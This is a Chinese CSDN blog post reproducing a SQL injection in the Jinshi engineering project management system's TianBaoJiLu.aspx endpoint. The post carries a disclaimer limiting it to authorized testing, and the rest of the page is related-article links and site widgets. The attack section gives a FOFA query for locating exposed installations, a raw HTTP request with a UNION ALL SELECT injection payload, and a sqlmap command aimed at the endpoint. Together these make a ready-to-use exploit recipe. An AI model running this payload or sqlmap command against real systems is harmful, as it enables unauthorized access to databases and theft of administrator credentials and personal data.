【漏洞复现】金石工程项目管理系统 TianBaoJiLu 存在SQL注入漏洞

最新推荐文章于 2024-06-24 10:49:44 发布
最新推荐文章于 2024-06-24 10:49:44 发布
阅读量624 收藏 3
点赞数 16
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137062094
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

金石工程项目管理系统TianBaoJiLu存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。

二、影响版本

金石工程项目管理系统

三、资产测绘

fofa:body="金石工程项目管理系统"

image-20240326235005481

四、漏洞复现

获取cookie

GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

image-20240327000359153

GET /query/shigongjihuajindu/TianBaoJiLu.aspx?id=1+UNION+ALL+SELECT+18%2C18%2C18%2C18%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2882%29%2BCHAR%2888%29%2BCHAR%28110%29%2BCHAR%2884%29%2BCHAR%2888%29%2BCHAR%2880%29%2BCHAR%2899%29%2BCHAR%2872%29%2BCHAR%2880%29%2BCHAR%2877%29%2BCHAR%2874%29%2BCHAR%2870%29%2BCHAR%28121%29%2BCHAR%28116%29%2BCHAR%2874%29%2BCHAR%2885%29%2BCHAR%2890%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%2869%29%2BCHAR%28110%29%2BCHAR%2897%29%2BCHAR%28104%29%2BCHAR%2867%29%2BCHAR%28119%29%2BCHAR%28122%29%2BCHAR%28111%29%2BCHAR%2876%29%2BCHAR%2883%29%2BCHAR%28115%29%2BCHAR%2883%29%2BCHAR%2871%29%2BCHAR%2887%29%2BCHAR%2881%29%2BCHAR%2879%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%2871%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18%2C18--+uInq HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=ypronsd4j1zw0ytvkg54cxc2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

sqlmap一把梭

sqlmap -u "http://ip/query/shigongjihuajindu/TianBaoJiLu.aspx?id=1" --batch --cookie 'ASP.NET_SessionId=pcqx2zs4gsnqprd5cvhtodmk'

image-20240327001515471

E_cho234
关注
  • 16
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞
weixin_43567873的博客
03-25 115
金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞
金石工程项目管理系统 SQL注入漏洞复现
0xSec
11-30 751
金石工程项目管理系统TianBaoJiLu.aspx接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
学生信息管理系统 项目数据库设计说明书
05-21 47
学生信息管理系统 项目数据库设计说明书 专 业: 计算机科学与技术 班 级: 2016级4班 姓 名: ** 报告日期: 2018年12月 目录 第一部分:课程设计内容... 2 第一章 绪论... 2...
公路建设项目管理软件
fanpuruanjian的博客
03-10 573
公路建设项目管理软件 对很多负责施工工程的资料管理和施工现场的管理人员来说,内心都有对一款工程施工的管理软件的需求。但是呢每个建筑施工企业的实际情况和需求各不相同,因此在选择一款相应的管理系统也是需要对自身的需求和痛点有一定的了解,这样才能选择到适合企业本身的系统。 一、那么一款关于道路施工现场的管理系统可以为企业带来哪些助力? 一款道路施工的工程项目管理软件是对整个建设工程项目进行组织建设、项目策划决策、规划设计、施工建设到竣工交付、总结评估、运维运营,全过程、全方位的对项目进行综合管理,可以及时反
博奥导出工程项目电子表格_博奥清单导出Excel后单位批量替换
weixin_39639174的博客
01-15 3127
博奥清单V17中,单位平方米和立方米的数字均为上标显示。为使打印出来后易于分辨,应BOSS要求,在导出Excel后将其修改为“m2”和“m3”。VBS批量修改代码:Option ExplicitIf Wscript.Arguments.Count = 0 ThenWScript.EchoChr(10) &_"[正确操作]" & Chr(10) & Chr(10) &...
深入浅出带你学习Tomcat中间件常见漏洞__零开始信息安全技巧
程序员三九的博客
05-29 385
本文正在参加「金石计划 . 瓜分6万现金大奖」前言前文给大家带来了中间件的漏洞,今天给大家带来的是中间件的常见漏洞,这也是一个应用非常广泛的中间件服务,下面会展开给大家讲解。
新疆 | 金石商砼效率革命背后的逻辑
tonghangapp的博客
05-29 689
原有的流程体系内,调度需要负责给司机排队、叫号、派车、打小票,还要给销售录订单,同时要兼顾生产问题,一旦前面几步运行不畅,势必会造成运转效率低下,料发不出去,进而导致工地断灰,那工地的夺命连环CALL就来了!司磅员其实是一个被忽略的群体。现在新系统施行后,据统计反映,原材料实时库存精准了很多,监管者也可以在手机上实时查看库存量、消耗料及过磅信息,彻底堵住了漏洞,也让司磅员们安心了不少,据说工资也涨了些,毕竟对企业来说,省了的就是赚了的,把省下来的利润分给下面员工一些,用高薪来养廉,这手段颇有些高明。
金石项目工程管理软件
12-06
二、本产品可提供项目进行过程中、竣工后、企业月度、季度、年度、跨年的项目成本报表,无论您的工程是百万、千万还是十亿、百亿,使用本产品,均可进行详细的统计与审查,报表可根据需求定制。 三、本产品可控成本...
金石工程项目管理软件使用流程.ppt
03-29
金石工程项目管理软件使用流程.ppt
金石工程项目管理软件
05-18
金石工程项目管理软件根据众多施工企业的需求研发出的一款施工管理软件,它不仅是单纯的材料管理、还包括,人工,机械,设备,租赁,合同、财务等模块。适合任何做工种施工的企业。它具有适用范围广、灵活度强、性价...
项目管理-金石工程项目管理软件网络集团版 V4.941.docx
07-05
金石工程项目管理软件》采用C/S+B/S混合架构,Server端利用微软SQL Server数据库存储数据,Client端在Windows环境下进行日常办公和数据分析,而Browser端则便于移动设备访问,特别是与微信的无缝整合,使得现场...
金石项目管理软件使用流程(与“材料”有关文档共21张).pptx
11-14
金石项目管理软件是一款专为建筑行业设计的项目管理工具,旨在优化项目流程,提高工作效率。以下是关于软件使用流程的一些核心知识点: 1. **项目开拓**:市场部在项目中标前,利用《工程管理》模块的《项目开拓》...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8297
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全网络安全威胁及途径
衍生星球的博客
06-17 216
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
CVE-2018-8120漏洞提权:Windows 7的安全剖析与实战应用
最新发布
weixin_43822401的博客
06-24 324
CVE-2018-8120是一个Windows 7操作系统的本地权限提升漏洞。攻击者利用此漏洞,可以在目标系统上执行提权操作,从而获得更高级别的访问权限。
网络安全(补充)
m0_62207482的博客
06-15 693
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
网络安全之Windows提权(上篇)(高级进阶)
weixin_70911257的博客
06-21 1003
提权顾名思义就是提升我们的权限能够让我们去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如拟圣旨,掌管虎符,拥有所有人的生杀大权,我们提权的目的就是当皇帝,皇帝做的我们也能做。说一下我的渗透思路吧,首先通过对方服务器的各种漏洞将我们的一句话木马上传至对方的服务器然后通过各种渗透工具连接服务器拿到基本的shell权限,然后将权限提升至基本用户权限,再通过对方补丁漏洞提升至最高权限。
共享打印机报0x0000011b
12-15
- 如果问题仍然存在,请卸载并重新安装打印机驱动程序。 2. 使用金石开发的工具修复错误 - 下载并运行金石开发的工具。 - 在共享打印机的电脑上选中此文件点鼠标右键,在出现的菜单中选择“以管理员身份运行”。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值